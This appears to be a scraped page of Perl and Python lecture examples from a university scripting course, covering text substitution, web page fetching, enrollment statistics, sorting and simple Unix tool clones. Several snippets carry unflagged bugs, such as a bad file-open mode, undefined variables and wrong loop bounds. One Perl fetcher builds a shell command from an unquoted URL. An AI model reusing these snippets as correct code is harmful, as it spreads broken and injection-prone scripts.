        $line =~ s/Zaphod/Harry/g;
    }

    open my $g, '>', ">$filename" or die "$0: Can not open $filename : $!";
    print $g @lines;
    close $g;
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text. text is read into a string, the string is changed, then the file is over-written

See http://www.perlmonks.org/?node_id=1952 for aletrantive way to read a file into a string

foreach $filename (@ARGV) {
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    while ($line = <$f>) {
        $novel .= $line;
    }
    close $f;

    $novel =~ s/Herm[io]+ne/Zaphod/g;
    $novel =~ s/Harry/Hermione/g;
    $novel =~ s/Zaphod/Harry/g;

    open my $g, '>', ">$filename" or die "$0: Can not open $filename : $!";
    print $g $novel;
    close $g;
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

The unix filter-like behaviour of <> is used to read files

Perl's -i option is used to replace file with output from script

while ($line = <>) {
    chomp $line;
    $line =~ s/Herm[io]+ne/Zaphod/g;
    $line =~ s/Harry/Hermione/g;
    $line =~ s/Zaphod/Harry/g;
    print $line;
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

The unix filter-like behaviour of <> is used to read files

Perl's -i option is used to replace file with output from the script.

Perl's default variable $_ is used

while (<>) {
    s/Herm[io]+ne/Zaphod/g;
    s/Harry/Hermione/g;
    s/Zaphod/Harry/g;
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Perl's -p option is used to produce unix filter-like behaviour.

Perl's -i option is used to replace file with output from the script.

s/Herm[io]+ne/Zaphod/g;
s/Harry/Hermione/g;
s/Zaphod/Harry/g;

Fetch a web page removing HTML tags and constants (e.g &amp;)

Lines between script or style tags are skipped.

Non-blank lines are printed

There are better ways to fetch web pages (e.g. HTTP::Request::Common)

The regex code below doesn't handle a number of cases. It is often better to use a library to properly parse HTML before processing it.

But beware illegal HTML is common & often causes problems for parsers.

foreach $url (@ARGV) {
    open my $f, '-|', "wget -q -O- '$url'" or die;
    while ($line = <$f>) {
        if ($line =~ /^\s*<(script|style)/i) {
            while ($line = <$f>) {
                last if $line =~ /^\s*<\/(script|style)/i;
            }
        } else {
            $line =~ s/&\w+;/ /g;
            $line =~ s/<[^>]*>//g;
            print $line if $line =~ /\S/;
        }
    }
    close $f;
}

Fetch a web page removing HTML tags and constants

The contents of script or style tags are removed..

Non-blank lines are printed

The regex code below doesn't handle a number of cases. It is often better to use a library to properly parse HTML before processing it.

But beware illegal HTML is common & often causes problems for parsers.

note the use of the s modifier to allow . to match a newline

use LWP::Simple;
foreach $url (@ARGV) {
	$html = get $url;
	$html =~ s/<script.*?<\/script>//isg;  # remove script tags including contents
	$html =~ s/<style.*?<\/style>//isg;    # remove style tags including contents
    $html =~ s/<.*?>//isg; # remove tags
    $html =~ s/\n\s*\n/\n/ig;  # blank lines
    print $html;
}

Find the positive integers among input text print their sum and mean

Note regexp to split on non-digits

Note check to handle empty string from split

@input_text_array = <>;
$input_text_array = join "", @input_text_array;

@numbers = split(/\D+/, $input_text_array);
print join(",", @numbers), "\n";

foreach $number (@numbers) {
	if ($number ne '') {
		$total += $number;
		$n++;
	}
}

if (@numbers) {
	printf "$n numbers: total $total mean %s\n", $total/$n;
}

Find integers (positive and negative) among input text print their sum and mean

Note regexp to match number: -?\d+

Harder to use split here (unlike just positive integers)

@input_text_array = <>;
$input_text_array = join "", @input_text_array;

@numbers = $input_text_array =~ /-?\d+/g;

foreach $number (@numbers) {
	$total += $number;
}

if (@numbers) {
	$n = @numbers;
	printf "$n numbers: total $total mean %s\n", $total/$n;
}

Print the last number (real or integer) on every line if there is one.

Note regexp to match number: -?\d+(\.\d+)?

while ($line = <>) {
	if ($line =~ /(-?\d+(\.\d+)?)\D*$/) {
		print "$1\n";
	}
}

count how many people enrolled in each course

open my $f, '<', "course_codes" or die "$0: can not open course_codes: $!";
while ($line = <$f>) {
    chomp $line;
    $line =~ /([^ ]+) (.+)/ or die "$0: bad line format '$line'";
    $course_names{$1} = $2;
}
close $f;

while ($course = <>) {
    chomp $course;
    $course =~ s/\|.*//;
    $count{$course}++;
}

foreach $course (sort keys %count) {
    print "$course_names{$course} has $count{$course} students enrolled\n";
}

run as count_first_names.pl enrollments count how many people enrolled have each first name

while ($line = <>) {
    @fields = split /\|/, $line;
    $student_number = $fields[1];
    next if $already_counted{$student_number};
    $already_counted{$student_number} = 1;
    $full_name = $fields[2];
    $full_name =~ /.*,\s+(\S+)/ or next;
    $first_name = $1;
    $fn{$first_name}++;
}

foreach $first_name (sort keys %fn) {
    printf "There are %2d people with the first name $first_name\n", $fn{$first_name};
}



run as duplicate_first_names.pl /home/cs2041/public_html/11s2/lec/perl/examples/enrollments

Report cases where there are multiple people of the same same first name enrolled in a course

while ($line = <>) {
    @fields = split /\|/, $line;
    $course = $fields[0];
    $full_name = $fields[2];
    $full_name =~ /.*,\s+(\S+)/ or next;
    $first_name = $1;
    $cfn{$course}{$first_name}++;
}

foreach $course (sort keys %cfn) {
    foreach $first_name (sort keys %{$cfn{$course}}) {
        next if $cfn{$course}{$first_name} < 2;
        printf "In $course there are %d people with the first name $first_name\n", $cfn{$course}{$first_name};
    }
}



run as course_first_names.pl enrollments report cases where there are multiple people same first name enrolled in acourse

while ($line = <>) {
    @fields = split /\|/, $line;
    $course = $fields[0];
    $full_name = $fields[2];
    $full_name =~ /.*,\s+(\S+)/ or next;
    $first_name = $1;
    $cfn{$course}{$first_name}++;
}

foreach $course (sort keys %cfn) {
    foreach $first_name (sort keys %{$cfn{$course}}) {
        next if $cfn{$course}{$first_name} < 2;
        printf "In $course there are %d people with the first name $first_name\n", $cfn{$course}{$first_name};
    }
}



for each courses specified as arguments print a summary of the other courses taken by students in this course

$enrollment_file = shift @ARGV or die;
$debug = 0;

open my $c, '<', "course_codes" or die "$0: can not open course_codes: $!";
while (<$c>) {
    ($code, $name) = /\s*(\S+)\s+(.*)/ or die "$0: invalid course codes line: $_";
    $course_name{$code} = $name;
    print STDERR "code='$code' -> name='$name'\n" if $debug;
}
close $c;

open my $f, "<$enrollment_file" or die "$0: can not open $enrollment_file: $!";;
while (<$f>) {
    ($course,$upi,$name) = split /\s*\|\s*/;
    push @{$course{$upi}}, $course;
    $name =~ s/(.*), (.*)/$2 $1/;
    $name =~ s/ .* / /;
    $name{$upi} = $name;
}
close $f;

foreach $course (@ARGV) {
    %n_taking = ();
    $n_students = 0;
    foreach $upi (keys %course) {
        @courses = @{$course{$upi}};
        next if !grep(/$course/, @courses);
        foreach $c (@courses) {
            $n_taking{$c}++;
        }
        $n_students++;
    }
    foreach $c (sort {$n_taking{$a} <=> $n_taking{$b}} keys %n_taking) {
        printf "%5.1f%% of %s students take %s %s\n",
            100*$n_taking{$c}/$n_students, $course, $c, $course_name{$c};
    }
}

Perl Functions:lecture slideslecture notes


This shows a bug due to a missing my declaration

In this case the use of $i in is_prime without a my declarations changes $i outside the function and breaks the while loop calling the function

sub is_prime {
	my ($n) = @_;
	$i = 2;
	while ($i < $n) {
		return 0 if $n % $i == 0;
	}
	return 1;
}

$i = 0;
while ($i < 1000) {
	print "$i\n" if is_prime($i);
}
		

3 different ways to sum a list - illustrating various aspects of Perl

simple for loop

sub sum_list0 {
    my (@list) = @_;
    my $total = 0;
    foreach $element (@list) {
       $total += $element;
    }
    return $total;
}

# recursive
sub sum_list1 {
    my (@list) = @_;
    return 0 if !@list;
    return $list[0] + sum_list1(@list[1..$#list]);
}

# join+eval - interesting but not recommended
sub sum_list2 {
    my (@list) = @_;
    return eval(join("+", @list))
}

print sum_list0(1..10), " ", sum_list1(1..10), " ", sum_list2(1..10),  "\n";

implementations of Perl's split & join

sub my_join {
    my ($separator, @list) = @_;
    return "" if !@list;
    my $string = shift @list;
    foreach $thing (@list) {
        $string .= $separator . $thing;
    }
    return $string;
}

sub my_split1 {
    my ($regexp, $string) = @_;
    my @list = ();
    while ($string =~ /(.*)$regexp(.*)/) {
        unshift @list, $2;
        $string = $1;
    }
    unshift @list, $string;
    return @list;
}

sub my_split2 {
    my ($regexp, $string) = @_;
    my @list = ();
    while ($string =~ s/(.*?)$regexp//) {
        push @list, $1;
    }
    push @list, $string;
    return @list;
}

$a = my_join("+", 1, 2);
print "$a = ", eval $a, "\n";
@a = my_split1(",", "1,2,3,4,5,6,7,8,10");
print "@a\n";
@a = my_split2(",", "1,2,3,4,5,6,7,8,10");
print "@a\n";

8 different ways to print the odd numbers in a list - illustrating various aspects of Perl

simple for loop

sub print_odd0 {
    my (@list) = @_;
    foreach $element (@list) {
        print "$element\n" if $element % 2;
    }
}

# simple for loop using index
sub print_odd1 {
    my (@list) = @_;
    foreach $i (0..$#list) {
        print "$list[$i]\n" if $list[$i] % 2;
    }
}

# set $_ in turn to each item in list
# evaluate supplied expression
# print item if the expression evaluates to true
sub print_list0 {
    my ($select_expression, @list) = @_;
    foreach $_ (@list) {
        print "$_\n" if &$select_expression;
    }
}

# calling helper function which prints
# items selected by an expression
sub print_odd2 {
    print_list0(sub {$_ % 2}, @_);
}

sub odd {
    return $_[0] % 2;
}

# more concise version of print_list0
sub print_list1 {
   &{$_[0]} && print "$_\n" foreach @_[1..$#_];
}

# calling helper function which prints
# items selected by an expression
sub print_odd3 {
    print_list1(sub {odd $_}, @_);
}

# set $_ in turn to each item in list
# evaluate supplied expression
# return a list of items for which the expression evaluated to true
sub my_grep0 {
    my $select_expression = $_[0];
    my @matching_elements;
    foreach $_ (@_[1..$#_]) {
        push @matching_elements, $_ if &$select_expression;
    }
    return @matching_elements;
}

# calling helper function which returns
# list items selected by an expression
sub print_odd4 {
    foreach $x (my_grep0 sub {$_ % 2}, @_) {
        print "$x\n";
    }
}


# more concise version of my_grep0
sub my_grep1 {
    my $select_expression = shift;
    my @matching_elements;
    &$select_expression && push @matching_elements, $_ foreach @_;
    return @matching_elements;
}

# calling helper function which returns
# list items selected by an expression
sub print_odd5 {
    my_grep1 sub {odd $_ && print "$_\n"}, @_;
}

# using built-in grep and combining print
sub print_odd6 {
    grep {$_ % 2 && print "$_\n"} @_;
}

# using built-in grep and join
sub print_odd7 {
    print join("\n", grep {$_ % 2} @_), "\n";
}


@a = (1..10);
foreach $version (0..7) {
    print "print_odd$version\n";
    &{"print_odd$version"}(@a);
}

implementations of Perl's push

sub mypush1 {
    my ($array_ref,@elements) = @_;
    if (@elements) {
        @$array_ref = (@$array_ref, @elements);
    } else {
        @$array_ref = (@$array_ref, $_);
    }
}
# same but with prototype
sub mypush2(\@@) {
    my ($array_ref,@elements) = @_;
    if (@elements) {
        @$array_ref = (@$array_ref, @elements);
    } else {
        @$array_ref = (@$array_ref, $_);
    }
}

@a = (1..10);
mypush1 \@a, 11..20;
mypush2 @a, 21..30;
print "@a\n";

%days = (Sunday => 0, Monday => 1, Tuesday => 2, Wednesday => 3,
         Thursday => 4, Friday => 5, Saturday => 6);

sub random_day {
    my @days = keys %days;
    return $days[rand @days];
}

sub compare_day {
    return $days{$a} <=> $days{$b};
}

push @random_days, random_day() foreach 1..5;
print "random_days=@random_days\n";
@sorted_days = sort compare_day @random_days;
print "sorted days=@sorted_days\n";

sub random_date {
    return sprintf "%02d/%02d/%04d", 1 + rand 28, 1 + rand 12, 2000+rand 20
}

sub compare_date {
    my ($day1,$month1,$year1) = split /\D+/, $a;
    my ($day2,$month2,$year2) = split /\D+/, $b;
    return $year1 <=> $year2 || $month1 <=> $month2 || $day1 <=> $day2;
}

push @random_dates, random_date() foreach 1..5;
print "random_dates=@random_dates\n";
@sorted_dates = sort compare_date @random_dates;
print "sorted dates=@sorted_dates\n";

print a HTML times table

Note html_times_table has 6 parameters calls to the function are hard to read and its easy to introduce errors

sub html_times_table {
    my ($min_x, $max_x, $min_y, $max_y, $bgcolor, $border) = @_;
    my $html = "<table border=$border bgcolor=$bgcolor>\n";
    foreach $y ($min_y..$max_y) {
        $html .= "<tr>";
        foreach $x ($min_x..$max_x) {
            $html .= sprintf "<td align=right>%s</td>", $x * $y;
        }
        $html .=  "</tr>\n";
    }
    $html .=  "</table>\n";
    return $html;
}

print html_times_table(1, 12, 1, 12, "pink", 1);

print a HTML times table

Note use of a hash to pass named parameters

sub html_times_table {
    my %parameters = @_;
    my $html = "<table border=$parameters{border} bgcolor=$parameters{bgcolor}>\n";
    foreach $y ($parameters{min_y}..$parameters{max_y}) {
        $html .= "<tr>";
        foreach $x ($parameters{min_x}..$parameters{max_y}) {
            $html .= sprintf "<td align=right>%s</td>", $x * $y;
        }
        $html .=  "</tr>\n";
    }
    $html .=  "</table>\n";
    return $html;
}

print html_times_table(bgcolor=>'pink', min_y=>1, max_y=>12, border=>1, min_x=>1, max_x=>12);

print a HTML times table

Note use of a hash to pass named parameters combined with a hash to provide default values for parameters

sub html_times_table {
    my %defaults = (min_x=>1, max_x=>10, min_y=>1, max_y=>10, bgcolor=>'white', border=>0);
    my %arguments = @_;
    my %parameters = (%defaults,%arguments);
    my $html = "<table border=$parameters{border} bgcolor=$parameters{bgcolor}>\n";
    foreach $y ($parameters{min_y}..$parameters{max_y}) {
        $html .= "<tr>";
        foreach $x ($parameters{min_x}..$parameters{max_y}) {
            $html .= sprintf "<td align=right>%s</td>", $x * $y;
        }
        $html .=  "</tr>\n";
    }
    $html .=  "</table>\n";
    return $html;
}

print html_times_table(max_y=>12, max_x=>12, bgcolor=>'pink');

@list = randomize_list(1..20);
print "@list\n";
@sorted_list0 = sort {$a <=> $b} @list;
print "@sorted_list0\n";
@sorted_list1 = quicksort0(@list);
print "@sorted_list1\n";
@sorted_list2 = quicksort1(sub {$a <=> $b}, @list);
print "@sorted_list2\n";

sub quicksort0 {
    return @_ if @_ < 2;
    my ($pivot,@numbers) = @_;
    my @less = grep {$_ < $pivot} @numbers;
    my @more = grep {$_ >= $pivot} @numbers;
    my @sorted_less = quicksort0(@less);
    my @sorted_more = quicksort0(@more);
    return (@sorted_less, $pivot, @sorted_more);
}


sub quicksort1 {
    my ($compare) = shift @_;
    return @_ if @_ < 2;
    my ($pivot, @input) = @_;
    my (@less, @more);
    partition1($compare, $pivot, \@input, \@less, \@more);
    my @sorted_less = quicksort1($compare, @less);
    my @sorted_more = quicksort1($compare, @more);
    my @r = (@sorted_less, $pivot, @sorted_more);
    return (@sorted_less, $pivot, @sorted_more);
}

sub partition1 {
    my ($compare, $pivot, $input, $smaller, $larger) = @_;
    foreach $x (@$input) {
        our $a = $x;
        our $b = $pivot;
        if (&$compare  < 0) {
            push @$smaller, $x;
        } else {
            push @$larger, $x;
        }
    }
}

sub randomize_list {
    my @newlist;
    while (@_) {
        my $random_index = rand @_;
        my $r = splice @_,  $random_index, 1;
        push @newlist, $r;
    }
    return @newlist;
}

sub quicksort0(@);
sub quicksort1(&@);
sub partition1(&$\@\@\@);
sub randomize_list(@);

@list = randomize_list 1..20;
print "@list\n";
@sorted_list0 = sort {$a <=> $b} @list;
print "@sorted_list0\n";
@sorted_list1 = quicksort0 @list;
print "@sorted_list1\n";
@sorted_list2 = quicksort1 {$a <=> $b} @list;
print "@sorted_list2\n";

sub quicksort0(@) {
    return @_ if @_ < 2;
    my ($pivot,@numbers) = @_;
    my @less = grep {$_ < $pivot} @numbers;
    my @more = grep {$_ >= $pivot} @numbers;
    my @sorted_less = quicksort0 @less;
    my @sorted_more = quicksort0 @more;
    return (@sorted_less, $pivot, @sorted_more);
}


sub quicksort1(&@) {
    my ($compare) = shift @_;
    return @_ if @_ < 2;
    my ($pivot, @input) = @_;
    my (@less, @more);
    partition1 \&$compare, $pivot, @input, @less, @more;
    my @sorted_less = quicksort1 \&$compare, @less;
    my @sorted_more = quicksort1 \&$compare, @more;
    my @r = (@sorted_less, $pivot, @sorted_more);
    return (@sorted_less, $pivot, @sorted_more);
}

sub partition1(&$\@\@\@) {
    my ($compare, $pivot, $input, $smaller, $larger) = @_;
    foreach $x (@$input) {
        our $a = $x;
        our $b = $pivot;
        if (&$compare  < 0) {
            push @$smaller, $x;
        } else {
            push @$larger, $x;
        }
    }
}

sub randomize_list(@) {
    my @newlist;
    while (@_) {
        my $random_index = rand @_;
        my $r = splice @_,  $random_index, 1;
        push @newlist, $r;
    }
    return @newlist;
}

rename specified files using specified Perl code

For each file the Perl code is executed with $_ set to the filename and the file is renamed to the value of $_ after the execution. /usr/bin/rename provides this functionality

die "Usage: $0 <perl> [files]\n" if !@ARGV;
$perl_code = shift @ARGV;
foreach $filename (@ARGV) {
    $_ = $filename;
    eval $perl_code;
    die "$0: $?" if $?; # eval leaves any error message in $?
    $new_filename = $_;
    next if $filename eq $new_filename;
    -e $new_filename and die "$0: $new_filename exists already\n";
    rename $filename, $new_filename or die "$0: rename $filename -> $new_filename failed: $!\n";
}

package Example_Module;
# written by andrewt@cse.unsw.edu.au for COMP2041 
# 
# Definition of a simple Perl module.
#
# List::Util provides the functions below and more

use base 'Exporter';
our @EXPORT = qw/sum min max minstr maxstr/;
use List::Util qw/reduce/;


sub sum {
	return reduce {$a + $b} @_;
}

sub min {
	return reduce {$a < $b ? $a : $b} @_;
}

sub max {
	return reduce {$a > $b ? $a : $b} @_;
}

sub minstr {
	return reduce {$a lt $b ? $a : $b} @_;
}

sub maxstr {
	return reduce {$a gt $b ? $a : $b} @_;
}

# necessary
1;

Use of a simple Perl module.

use Example_Module qw/max/;

# As max is specified in our import list it can be used without the package name
print max(42,3,5), "\n";

# We don't import min explicitly so it needs the package name
print Example_Module::min(42,3,5), "\n";

Python:lecture slideslecture notes
Evan's: Python slidesAdvanced Python slidesPort Forwarding TutorialFlask Tutorial Video
External resources: python.org tutorialPerl-->PythonrecipesCrash into PythonGoogle tutorialQuick Guide The hard way


compute Pythagoras' Theorem

Works with any Python version but prints a newwline after the 2 prompts

import math, sys

print("Enter x:")
x = float(sys.stdin.readline())
print("Enter y:")
y = float(sys.stdin.readline())
pythagoras = math.sqrt(x * x + y * y)
print("The square root of %f squared + %f squared is %f" % (x, y, pythagoras))

compute Pythagoras' Theorem

Works with Python 3.3+

import math, sys

print("Enter x: ", end='', flush=True)
x = float(sys.stdin.readline())
print("Enter y: ", end='', flush=True)
y = float(sys.stdin.readline())
pythagoras = math.sqrt(x * x + y * y)
print("The square root of %f squared + %f squared is %f" % (x, y, pythagoras))

compute Pythagoras' Theorem

Works with any Python version

import math, sys

sys.stdout.write("Enter x: ")
sys.stdout.flush()
x = float(sys.stdin.readline())
sys.stdout.write("Enter x: ")
sys.stdout.flush()
y = float(sys.stdin.readline())
pythagoras = math.sqrt(x * x + y * y)
print("The square root of %f squared + %f squared is %f" % (x, y, pythagoras))

count how many people enrolled in each course

Read numbers until end of input (or a non-number) is reached then print the sum of the numbers

import re, sys

sum = 0

while 1:
    line = sys.stdin.readline()
    line = line.strip() # remove leading & trailing white space
    # Test if string looks like an integer or real (scientific notation not handled!)
    if not re.search(r'^\d[.\d]*$', line):
        break
    sum += float(line)

print("Sum of the numbers is %s" % sum)

Simple example reading a line of input and examining characters

import sys

sys.stdout.write("Enter some input: ")
line = sys.stdin.readline()
if not line:
    sys.stdout.write("%s: could not read any characters\n" % sys.argv[0])
line = line.rstrip('\n')
n_chars = len(line)
print("That line contained %s characters" % n_chars)
if n_chars > 0:
    first_char =line[0]
    last_char = line[-1]
    print("The first character was '%s'" % first_char)
    print("The last character was '%s'" % last_char)

create a string of size 2^n by concatenation
import sys
if len(sys.argv) != 2:
    sys.stderr.write("Usage: %s <n>\n" % sys.argv[0])
    sys.exit(1)
n = 0
string = '@'
while  n  < int(sys.argv[1]):
    string =  string + string
    n += 1
print("String of 2^%d = %d characters created\n" % (n, len(string)));

Python implementation of /bin/echo

Note this prints an extra space on the end of the line

from __future__ import print_function  # Python 2.6+ compatibility

import sys

for arg in sys.argv[1:]:
    print(arg, end=' ')
print()

Python implementation of /bin/echo

Clumsy but works with any Python version

import sys

if len(sys.argv) > 1:
    sys.stdout.write(sys.argv[1])
for arg in sys.argv[2:]:
    sys.stdout.write(' ' + arg)
print()

Python implementation of /bin/echo

from __future__ import print_function # Python 2.6+ compatibility

import sys

if len(sys.argv) > 1:
    print(argv[1], end='')
for arg in sys.argv[2:]:
    print(' ' + arg, end='')
print()

Python implementation of /bin/echo

import sys

print(' '.join(sys.argv[1:]))

sum integers supplied as command line arguments no check that arguments are integers

import sys

sum = 0
for arg in sys.argv[1:]:
    sum += int(arg)
print("Sum of the numbers is %s" % sum)


Count the number of lines on standard input.

import sys

line_count = 0
for line in sys.stdin:
    line_count += 1
print("%d lines" % line_count)

Count the number of lines on standard input.

import sys

lines = sys.stdin.readlines()
line_count = len(lines)
print("%d lines" % line_count)

Count the number of lines on standard input.

import sys

print("%d lines" % len(list(sys.stdin)))

Simple cp implementation using line by line I/O

import sys,os
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <infile> <outfile>\n" % sys.argv[0])
    # or (Python3 only):
    # print("Usage:",  sys.argv[0], "<infile> <outfile>", file=sys.stderr)
    sys.exit(1)
outfile = open(sys.argv[2], 'w')
for line in open(sys.argv[1]):
    outfile.write(line)

Simple cp implementation using line by line I/O and with statement

import sys,os
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <enrollment_file> <course_codes>\n" % sys.argv[0])
    sys.exit(1)
with open(sys.argv[1]) as infile:
    with open(sys.argv[2], 'w') as outfile:
        for line in infile:
            outfile.write(line)

Simple cp implementation reading file into a list

import sys
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <enrollment_file> <course_codes>\n" % sys.argv[0])
    sys.exit(1)
lines = open(sys.argv[1]).readlines()
open(sys.argv[2], 'w').writelines(lines)

Simple cp implementation using line by line I/O

import sys,os
if len(sys.argv) != 3:
    sys.stdout.write("Usage: %s <infile> <outfile>\n" % sys.argv[0])
    sys.exit(1)
open(sys.argv[2], 'w').writelines(open(sys.argv[1]))

Simple cp implementation using shutil.copyfile

import sys,shutil
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <enrollment_file> <course_codes>\n" % sys.argv[0])
    sys.exit(1)
shutil.copyfile(sys.argv[1], sys.argv[2])

Simple cp implementation by running /bin/cp

import sys,subprocess
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <enrollment_file> <course_codes>\n" % sys.argv[0])
    sys.exit(1)
subprocess.call(['cp', sys.argv[1], sys.argv[2]])

fetch a web page remove HTML tags, constants, text between script blank lines and print non-empty lines.

There are python libraries which provide a better way to fetch web pages

subprocess.check_output was introduced in Python 2.7.

In older Pythons version you might use: webpage = subprocess.Popen(["wget","-q","-O-",url], stdout=subprocess.PIPE).communicate()[0]

The regex code below doesn't handle a number of cases. It is often better to use a library to properly parse HTML before processing it.

But beware illegal HTML is common & often causes problems for parsers.

import sys, re, subprocess
for url in sys.argv[1:]:
    webpage = subprocess.check_output(["wget", "-q", "-O-", url], universal_newlines=True)
    webpage = re.sub(r'(?i)<script>.*?</script>', '', webpage)
    webpage = re.sub(r'(?i)<style>.*?</style>', '', webpage)
    webpage = re.sub(r'&\w+;', ' ', webpage)
    webpage = re.sub(r'<[^>]*>', '', webpage)
    webpage = re.sub(r'\n\s*\n', '\n', webpage)
    sys.stdout.write(webpage)

fetch a web page remove HTML tags and constants and print non-empty lines

The regex code below doesn't handle a number of cases. It is often better to use a library to properly parse HTML before processing it.

But beware illegal HTML is common & often causes problems for parsers.

import re, sys

# urllib package names changed in Python 3
try:
    from urllib import urlopen # Python 2
except ImportError:
    from urllib.request import urlopen # Python 3

for url in sys.argv[1:]:
    response = urlopen(url)
    webpage = response.read().decode()
    webpage = re.sub(r'(?i)<script>.*?</script>', '', webpage)
    webpage = re.sub(r'(?i)<style>.*?</style>', '', webpage)
    webpage = re.sub(r'&\w+;', ' ', webpage)
    webpage = re.sub(r'<[^>]*>', '', webpage)
    webpage = re.sub(r'\n\s*\n', '\n', webpage)
    sys.stdout.write(webpage)

fetch a web page remove HTML tags and constants using HTML parser BeautifulSoup and print non-empty lines

import re, sys
from urllib import urlopen
import BeautifulSoup

# on Python 3 instead do
# from urllib.request import urlopen # Python 3
# import bs4 as BeautifulSoup
# and change BeautifulSoup(webpage) to BeautifulSoup(webpage, "lxml")

def traverse(html):
    if isinstance(html, BeautifulSoup.Tag):
        if html.name in ['style', 'script']:
            return ""
        else:
            return traverse(html.contents)
    elif isinstance(html, list):
        return "".join([traverse(h) for h in html])
    else:
        return html

for url in sys.argv[1:]:
    webpage = urlopen(url).read().decode()
    soup = BeautifulSoup.BeautifulSoup(webpage)
    text = traverse(soup)
    text = re.sub(r'\n\s*\n', '\n', text)
    sys.stdout.write(text)

Reads lines of input until end-of-input

Print snap! if a line has been seen previously

import sys
seen = {}
while 1:
    sys.stdout.write("Enter line: ")
    sys.stdout.flush()
    line = sys.stdin.readline()
    if not line:
        break
    if line in seen:
        print("Snap!")
    seen[line] = 1

count how many people enrolled in each course

import fileinput, re

course_names = {}
for line in open("course_codes"):
    m = re.match(r'(\S+)\s+(.*\S)', line)
    if m:
        course_names[m.group(1)] = m.group(2);

count = {}
for line in fileinput.input():
    course = re.sub(r'\|.*\n', '', line)
    if course in count:
        count[course] += 1
    else:
        count[course] = 1

for course in sorted(count.keys()):
    print("%s has %s students enrolled"%(course_names[course], count[course]))

run as count_first_names.py enrollments count how many people enrolled have each first name

import fileinput, re

already_counted = {}
fn = {}
for line in fileinput.input():
    fields = line.split('|')
    student_number = fields[1]
    if student_number in already_counted:
        continue
    already_counted[student_number] = 1
    full_name = fields[2]
    m = re.match(r'.*,\s+(\S+)', full_name)
    if m:
        first_name = m.group(1)
        if first_name in fn:
            fn[first_name] += 1
        else:
            fn[first_name] = 1

for first_name in sorted(fn.keys()):
    print("There are %2d people with the first name %s"%(fn[first_name], first_name))

INTERNAL ERROR MISSING FILE: "code/python/course_first_names.py"
INTERNAL ERROR MISSING FILE: "code/python/course_first_names.py"

for each courses specified as arguments print a summary of the other courses taken by students in this course

import sys,re

if len(sys.argv) < 3:
    sys.stderr.write("Usage: %s <enrollment_file> <course_codes>\n" % sys.argv[0])
    # or (Python3 only):
    # print("Usage:",  sys.argv[0], "<enrollment_file> <course_codes>", file=sys.stderr)
    sys.exit(1)
enrollment_file = sys.argv.pop(1)

course_names = {}
for line in open("course_codes"):
    line = line.rstrip()
    code = line[0:8]
    name = line[9:]
    course_names[code] = name

courses = {}
names = {}
for line in open(enrollment_file):
    (course,upi,name) = line.split("|")[0:3]
    m = re.match(r'(.*),\s+(.*\S)', name)
    if m:
        name = m.group(2) + " " + m.group(1)
    if upi in courses:
        courses[upi].append(course)
    else:
        courses[upi] = [course]
    names[upi] = name.rstrip()


for course in sys.argv[1:]:
    n_taking = {}
    n_students = 0
    for upi in list(courses.keys()):
        if course not in courses[upi]:
            continue
        n_students += 1
        for c in courses[upi]:
            if c in n_taking:
                n_taking[c] += 1
            else:
                n_taking[c] = 1
    for c in sorted(list(n_taking.keys()), key=lambda x: n_taking[x]):
        print("%5.1f%% of %s students take %s %s"%(100*n_taking[c]/n_students, course, c, course_names[c]))

run as duplicate_first_names.py /home/cs2041/public_html/11s2/lec/perl/examples/enrollments

Report cases where there are multiple people of the same same first name enrolled in a course

import fileinput, re

cfn = {}
for line in fileinput.input():
    fields = line.split('|')
    course = fields[0]
    full_name = fields[2]
    m = re.match(r'.*,\s+(\S+)', full_name)
    if not m:
        continue
    first_name = m.group(1)
    if course not in cfn:
        cfn[course] = {}
    if first_name in cfn[course]:
        cfn[course][first_name] += 1
    else:
        cfn[course][first_name] = 1

for course in sorted(cfn.keys()):
    for first_name in sorted(cfn[course].keys()):
        n = cfn[course][first_name]
        if n > 1:
            print("In %s there are %d people with the first name %s"%(course, n, first_name))

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

import re, sys,os
for filename in sys.argv[1:]:
    tmp_filename = filename + '.new'
    if os.path.exists(tmp_filename):
        sys.err.write("%s: %s already exists\n" % (sys.argv[0], tmp_filename))
        sys.exit(1)
    with open(filename) as f:
        with open(tmp_filename, 'w') as g:
            for line in f:
                line = re.sub(r'Herm[io]+ne', 'Zaphod', line)
                line = line.replace('Harry', 'Hermione')
                line = line.replace('Zaphod', 'Harry')
                g.write(line)
    os.rename(tmp_filename, filename)

print the courses being taken by each student enrolled in the specified courses

import sys,re
if len(sys.argv) < 3:
    sys.stdout.write("Usage: %s <enrollment_file> <course_codes>\n" % sys.argv[0])
    sys.exit(1)
enrollment_file = sys.argv.pop(1)

course_names = {}
for line in open("course_codes"):
    line = line.rstrip()
    code = line[0:8]
    name = line[9:]
    course_names[code] = name

courses = {}
names = {}
for line in open(enrollment_file):
    (course,upi,name) = line.split("|")[0:3]
    m = re.match(r'(.*),\s+(.*\S)', name)
    if m:
        name = m.group(2) + " " + m.group(1)
    if upi in courses:
        courses[upi] += " " + course
    else:
        courses[upi] = course
    names[upi] = name.rstrip()


for course in sys.argv[1:]:
    for upi in list(courses.keys()):
        student_courses = courses[upi].split()
        if course not in student_courses:
            continue
        print("%s is taking"%(names[upi]))
        for course in student_courses:
            print("%s %s"%(course, course_names[course]))

Print the nth word on every line of input files/stdin output is piped through fmt to make reading easy

from __future__ import print_function # Python 2.6+ compatibility

import fileinput, sys, subprocess

if len(sys.argv) < 2:
    sys.stdout.write("Usage: %s <n>\n" % sys.argv[0])
    sys.exit(1)

nth_word = int(sys.argv.pop(1))
p = subprocess.Popen(["fmt","-w","40"], stdin=subprocess.PIPE, universal_newlines=True)
for line in fileinput.input():
    words = line.rstrip().split()
    if len(words) > nth_word:
        print(words[nth_word], file=p.stdin)
p.stdin.close()

5 different ways to print the odd numbers in a list - illustrating various aspects of Python

simple for loop

